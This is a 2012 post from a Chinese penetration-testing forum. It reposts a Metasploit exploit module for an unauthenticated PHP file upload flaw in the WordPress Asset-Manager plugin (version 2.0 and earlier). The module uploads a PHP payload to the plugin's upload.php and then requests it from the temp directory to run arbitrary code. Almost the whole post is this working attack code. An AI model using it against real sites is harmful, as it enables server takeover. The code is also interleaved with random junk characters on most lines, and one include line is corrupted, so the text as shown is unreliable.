中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。$ c& w9 ~! l! n

  F9 R% }5 p. X( s8 G' O: w! n##: E8 j& H8 o; _2 j2 f
# This file is part of the Metasploit Framework and may be subject to
' Y" t) L# ?5 U) |% _# redistribution and commercial restrictions. Please see the Metasploit
2 C  B' J- j% C: w# Framework web site for more information on licensing and terms of use.
1 a2 f. J/ v9 m8 l#   http://metasploit.com/framework/
& n% ~1 P, ^, u##
" d- w! S( D8 ~( J) s0 G8 h & r. O# {  I! G( T& M# b& n8 E( `
require 'msf/core'8 |) m# l1 s1 _7 S8 @1 _. r
require 'msf/core/exploit/php_exe'
7 Z# h3 ?5 M2 c: P4 X % d9 r8 r- x& G
class Metasploit3 < Msf::Exploit::Remote
$ G! {8 R6 H4 j  Rank = ExcellentRanking
9 `# A, N& z: b2 Y' W' b) F % o# W1 m6 w% J" h, U
  include Msf::Exploit::Remote::HttpClient7 H, n. K7 v( |  M9 m! {
  include Msf::Exploit:hpEXE- V8 f& t: x6 i$ J5 T, `" _
7 ]' ~0 \1 E2 X+ a4 h: U6 r7 l6 P
  def initialize(info = {})
/ i# g. p4 Y5 ?& B" C+ v    super(update_info(info,1 @! m% M- e, S
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
, t/ \; W) d9 z* r. T      'Description'    => %q{( {+ }& {* Y/ a
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress8 t- @8 G# {9 z' U
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a# h3 R6 B! n) x! O% |
        temp directory without authentication, which results in arbitrary code execution.+ [  O% f' W& X) `
      },4 ~# _1 [; g- b$ X" s
      'Author'         =>
( V% q, B2 l5 C& t        [, a4 H$ {. N6 C4 D
          'Sammy FORGIT', # initial discovery, b$ [4 i, P/ R5 [! e2 G
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module- N; [' R, R, a5 Q: [
        ],
7 [- Z" ]; s& D      'License'        => MSF_LICENSE,2 b9 S, G. O1 N, Q& W7 O9 ~
      'References'     =>  Q  A0 ?$ _0 X0 t1 S  m
        [
% T9 T9 c, G$ W& C: L# N# T: }          [ 'OSVDB', '82653' ],
+ s3 u: g+ H+ R* C, {. w) g) [- @9 y          [ 'BID', '53809' ],
" y7 w4 X! R( ^7 i5 n& Z          [ 'EDB', '18993' ],
2 V; ]3 _3 `$ D7 |( k) w( E: p; {' V          [ 'URL', 'http:// www.myhack58.com /' ]
4 o. A/ @0 T) W5 c1 W/ s: f: q        ],
) W  @9 \+ L+ r3 ]8 M' @+ f/ u) N      'Payload'       =>
' r" I1 ~/ @) R- ?' J        {- ~" w  K7 X  G! T
          'BadChars' => "\x00",
8 h% \6 e1 v. k/ M5 c; B8 k/ D9 d# g        },
- B1 M% L* @) @. e( A6 m" Y) n  h      'Platform'       => 'php',
9 v3 b  ~3 V# [; T- P' N5 q      'Arch'           => ARCH_PHP,
8 A$ I+ b: e1 T0 z4 S% }      'Targets'        =>, Y7 N2 z8 e2 S. b0 k
        [
0 P, _* w9 u3 K5 a          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
& u* L: I' e& p          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
- ?' Z  A- H* |  H  o( ?. s4 ^        ],
: h6 o1 Q, ^. h! `, g2 T4 t      'DefaultTarget' => 0,' w. ~6 b+ Y2 v5 Z5 Q( B$ C: d3 u: M
      'DisclosureDate' => 'May 26 2012'))  Y" q7 h# r8 ]) K
0 j' X$ M- c) A6 F2 _4 R1 P. z- J
    register_options(
2 ~: m4 Q0 {! L' ?) l9 P4 O/ a      [
4 t( `/ u4 ]- L6 R        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
: Z, w% w+ H/ j" g      ], self.class)
7 ?, Z# G. z8 H- m  \  end
" P$ Y( A0 H. w% s; R - \: w0 e% Z* G( Q7 u7 s
  def exploit; ]- m2 J) Z; m0 [& P3 H' R
    uri =  target_uri.path
! h. k9 P" ?1 e2 W7 k    uri << '/' if uri[-1,1] != '/'
6 i* d/ E( [. _( s& A    peer = "#{rhost}:#{rport}"2 o5 C5 {. ]" ]
    payload_name = "#{rand_text_alpha(5)}.php"( ~9 h" W! u( q$ v, K& P# _
    php_payload = get_write_exec_payload(:unlink_self=>true)4 B; l% E1 B' E' _" s; X0 k+ h

# d) a7 C1 ^( R    data = Rex::MIME::Message.new! q; }8 H3 v: v* Y: A" p' P+ o
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""); T; R5 D1 B6 B
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')" z) K+ A  j( s. e) M$ w

7 O. N, Z: l/ c9 Q    print_status("#{peer} - Uploading payload #{payload_name}")
3 i: n4 D! O: \6 w" N' ~    res = send_request_cgi({
5 v0 o2 s) ?2 \/ ~; Y" C+ C      'method'  => 'POST',
2 e% G7 J2 L/ X( _+ k      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",0 c  t8 g" a2 g! A; E
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",. A( T6 N7 C; @( N
      'data'    => post_data, m- U, w: V5 u' f
    })
7 h0 n* H3 h: Z" n# p4 J4 R+ p% f 0 X. K) @% Y8 K' K# j1 D1 G
    if not res or res.code != 200 or res.body !~ /#{payload_name}/& p: J( I, K& W; C4 |
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")3 m4 Y* J4 \) T2 n
end/ O3 d, G4 }, S4 C. K4 k
) E( z2 o( b8 r: z" P5 B  u
    print_status("#{peer} - Executing payload #{payload_name}")5 G: [4 u0 C8 D% q8 F# C4 Q
    res = send_request_raw({
( ~  k3 _% y7 N4 X: b6 G3 o  L      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
; _/ U4 y( [- s1 m      'method'  => 'GET'- _* G! b+ [- @: B! n6 ?/ I8 i8 a
    })' W& V" r! J$ {- N, _2 o1 }% Y/ c
4 K7 a! ~+ M4 s/ X
    if res and res.code != 200$ z/ _/ ~, t, B& R8 e3 s
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
  ?* o0 W$ g, S  _  m    end
1 ^# U% L. \; I+ v) J8 u' o3 U  D  end
& g4 f3 \; Z. ]$ @end* q& V9 p  d3 c, G0 g1 Y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2